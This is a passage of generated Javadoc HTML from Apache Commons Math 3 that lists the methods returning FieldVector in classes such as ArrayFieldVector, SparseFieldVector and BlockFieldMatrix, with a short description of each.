href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Construct a vector by appending a vector to this vector.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html#append(org.apache.commons.math3.linear.FieldVector)">append</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Construct a vector by appending a vector to this vector.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">SparseFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html#append(org.apache.commons.math3.linear.SparseFieldVector)">append</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="class in org.apache.commons.math3.linear">SparseFieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Construct a vector by appending a vector to this vector.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">ArrayFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#append(T)">append</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&nbsp;in)</code> <div class="block">Construct a vector by appending a T to this vector.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">SparseFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html#append(T)">append</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&nbsp;d)</code> <div class="block">Construct a vector by appending a T to this vector.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html#append(T)">append</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&nbsp;d)</code> <div class="block">Construct a vector by appending a T to this vector.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">ArrayFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#copy()">copy</a></strong>()</code> <div class="block">Returns a (deep) copy of this.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">SparseFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html#copy()">copy</a></strong>()</code> <div class="block">Returns a (deep) copy of this.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html#copy()">copy</a></strong>()</code> <div class="block">Returns a (deep) copy of this.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static &lt;T extends <a href="../../../../../../org/apache/commons/math3/FieldElement.html" title="interface in org.apache.commons.math3">FieldElement</a>&lt;T&gt;&gt;&nbsp;<br><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;T&gt;</code></td> <td class="colLast"><span class="strong">MatrixUtils.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/MatrixUtils.html#createFieldVector(T[])">createFieldVector</a></strong>(T[]&nbsp;data)</code> <div class="block">Creates a <a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear"><code>FieldVector</code></a> using the data from the input array.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">ArrayFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#ebeDivide(org.apache.commons.math3.linear.FieldVector)">ebeDivide</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Element-by-element division.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">SparseFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html#ebeDivide(org.apache.commons.math3.linear.FieldVector)">ebeDivide</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Element-by-element division.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html#ebeDivide(org.apache.commons.math3.linear.FieldVector)">ebeDivide</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Element-by-element division.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">ArrayFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#ebeMultiply(org.apache.commons.math3.linear.FieldVector)">ebeMultiply</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Element-by-element multiplication.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">SparseFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html#ebeMultiply(org.apache.commons.math3.linear.FieldVector)">ebeMultiply</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Element-by-element multiplication.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html#ebeMultiply(org.apache.commons.math3.linear.FieldVector)">ebeMultiply</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;&nbsp;v)</code> <div class="block">Element-by-element multiplication.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/BlockFieldMatrix.html" title="type parameter in BlockFieldMatrix">T</a>&gt;</code></td> <td class="colLast"><span class="strong">BlockFieldMatrix.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/BlockFieldMatrix.html#getColumnVector(int)">getColumnVector</a></strong>(int&nbsp;column)</code> <div class="block">Returns the entries in column number <code>column</code> as a vector.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldMatrix.html" title="type parameter in FieldMatrix">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldMatrix.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldMatrix.html#getColumnVector(int)">getColumnVector</a></strong>(int&nbsp;column)</code> <div class="block">Returns the entries in column number <code>column</code> as a vector.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/AbstractFieldMatrix.html" title="type parameter in AbstractFieldMatrix">T</a>&gt;</code></td> <td class="colLast"><span class="strong">AbstractFieldMatrix.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/AbstractFieldMatrix.html#getColumnVector(int)">getColumnVector</a></strong>(int&nbsp;column)</code> <div class="block">Returns the entries in column number <code>column</code> as a vector.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/BlockFieldMatrix.html" title="type parameter in BlockFieldMatrix">T</a>&gt;</code></td> <td class="colLast"><span class="strong">BlockFieldMatrix.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/BlockFieldMatrix.html#getRowVector(int)">getRowVector</a></strong>(int&nbsp;row)</code> <div class="block">Get the entries in row number <code>row</code> as a vector.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldMatrix.html" title="type parameter in FieldMatrix">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldMatrix.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldMatrix.html#getRowVector(int)">getRowVector</a></strong>(int&nbsp;row)</code> <div class="block">Get the entries in row number <code>row</code> as a vector.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/AbstractFieldMatrix.html" title="type parameter in AbstractFieldMatrix">T</a>&gt;</code></td> <td class="colLast"><span class="strong">AbstractFieldMatrix.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/AbstractFieldMatrix.html#getRowVector(int)">getRowVector</a></strong>(int&nbsp;row)</code> <div class="block">Get the entries in row number <code>row</code> as a vector.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">ArrayFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#getSubVector(int, int)">getSubVector</a></strong>(int&nbsp;index, int&nbsp;n)</code> <div class="block">Get a subvector from consecutive elements.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">SparseFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html#getSubVector(int, int)">getSubVector</a></strong>(int&nbsp;index, int&nbsp;n)</code> <div class="block">Get a subvector from consecutive elements.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html#getSubVector(int, int)">getSubVector</a></strong>(int&nbsp;index, int&nbsp;n)</code> <div class="block">Get a subvector from consecutive elements.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">ArrayFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#mapAdd(T)">mapAdd</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&nbsp;d)</code> <div class="block">Map an addition operation to each entry.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">SparseFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html#mapAdd(T)">mapAdd</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&nbsp;d)</code> <div class="block">Map an addition operation to each entry.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html#mapAdd(T)">mapAdd</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&nbsp;d)</code> <div class="block">Map an addition operation to each entry.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">ArrayFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#mapAddToSelf(T)">mapAddToSelf</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&nbsp;d)</code> <div class="block">Map an addition operation to each entry.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">SparseFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html#mapAddToSelf(T)">mapAddToSelf</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&nbsp;d)</code> <div class="block">Map an addition operation to each entry.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html#mapAddToSelf(T)">mapAddToSelf</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&nbsp;d)</code> <div class="block">Map an addition operation to each entry.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">ArrayFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#mapDivide(T)">mapDivide</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&nbsp;d)</code> <div class="block">Map a division operation to each entry.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">SparseFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html#mapDivide(T)">mapDivide</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&nbsp;d)</code> <div class="block">Map a division operation to each entry.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html#mapDivide(T)">mapDivide</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&nbsp;d)</code> <div class="block">Map a division operation to each entry.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">ArrayFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#mapDivideToSelf(T)">mapDivideToSelf</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&nbsp;d)</code> <div class="block">Map a division operation to each entry.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">SparseFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html#mapDivideToSelf(T)">mapDivideToSelf</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&nbsp;d)</code> <div class="block">Map a division operation to each entry.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html#mapDivideToSelf(T)">mapDivideToSelf</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&nbsp;d)</code> <div class="block">Map a division operation to each entry.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">ArrayFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#mapInv()">mapInv</a></strong>()</code> <div class="block">Map the 1/x function to each entry.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">SparseFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html#mapInv()">mapInv</a></strong>()</code> <div class="block">Map the 1/x function to each entry.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html#mapInv()">mapInv</a></strong>()</code> <div class="block">Map the 1/x function to each entry.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">ArrayFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#mapInvToSelf()">mapInvToSelf</a></strong>()</code> <div class="block">Map the 1/x function to each entry.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">SparseFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html#mapInvToSelf()">mapInvToSelf</a></strong>()</code> <div class="block">Map the 1/x function to each entry.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html#mapInvToSelf()">mapInvToSelf</a></strong>()</code> <div class="block">Map the 1/x function to each entry.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">ArrayFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#mapMultiply(T)">mapMultiply</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&nbsp;d)</code> <div class="block">Map a multiplication operation to each entry.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">SparseFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html#mapMultiply(T)">mapMultiply</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/SparseFieldVector.html" title="type parameter in SparseFieldVector">T</a>&nbsp;d)</code> <div class="block">Map a multiplication operation to each entry.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">FieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html#mapMultiply(T)">mapMultiply</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="type parameter in FieldVector">T</a>&nbsp;d)</code> <div class="block">Map a multiplication operation to each entry.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code><a href="../../../../../../org/apache/commons/math3/linear/FieldVector.html" title="interface in org.apache.commons.math3.linear">FieldVector</a>&lt;<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&gt;</code></td> <td class="colLast"><span class="strong">ArrayFieldVector.</span><code><strong><a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html#mapMultiplyToSelf(T)">mapMultiplyToSelf</a></strong>(<a href="../../../../../../org/apache/commons/math3/linear/ArrayFieldVector.html" title="type parameter in ArrayFieldVector">T</a>&nbsp;d)</code> <div class="block">Map a 